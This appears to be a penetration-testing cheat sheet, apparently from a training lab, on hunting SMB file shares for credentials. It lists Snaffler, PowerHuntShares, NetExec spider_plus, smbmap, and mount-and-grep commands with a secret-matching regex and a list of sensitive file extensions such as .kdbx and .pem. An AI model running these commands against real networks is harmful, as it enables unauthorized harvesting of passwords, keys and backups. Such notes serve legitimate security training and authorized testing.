Share hunting turns SMB access into useful findings. We search for passwords, keys, scripts, deployment files, database backups, KeePass databases, VPN profiles, SQL connection strings, and admin runbooks.
Snaffler from Windows
.\Snaffler.exe -d ootw.local -s -v data
.\Snaffler.exe -d ootw.local -s -o snaffler.log
PowerHuntShares from Windows
Import-Module .\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -OutputDirectory .\share-audit
NetExec spider_plus
nxc smb 10.10.10.200 -u student -p 'student' -M spider_plus
nxc smb 10.10.10.200 -u student -p 'student' -M spider_plus -o DOWNLOAD_FLAG=True
nxc smb 10.10.10.0/24 -u student -p 'student' -M spider_plus
smbmap targeted search
smbmap -H 10.10.10.200 -d ootw.local -u student -p 'student' -R IT -A '.xml|.config|.kdbx|.txt|.ps1|.bat|.sql|.bak'
smbmap -H 10.10.10.200 -d ootw.local -u student -p 'student' -R Finance -A 'password|secret|key|backup|vpn'
Mount and grep
sudo mount -t cifs //10.10.10.200/IT /mnt/it -o username=student,password='student',domain=ootw.local,vers=3.0
grep -RInP --exclude-dir={.git,node_modules,venv} -n -C3 "(?i)password|pass(word|wd|phrase)?|secret|api[_-]?key|private[_-]?key|client_secret|BEGIN (RSA|OPENSSH|ENCRYPTED|PRIVATE) KEY" /mnt/it
Manual extensions
.config
.xml
.ini
.ps1
.bat
.cmd
.sql
.bak
.zip
.7z
.kdbx
.rdp
.ovpn
.ppk
.pem
.key
.pfx
Notes
- Share hunting is usually higher value than immediate command execution.
- Files often reveal service accounts, deployment credentials, backup locations, and privilege paths that are quieter than spraying or shelling hosts.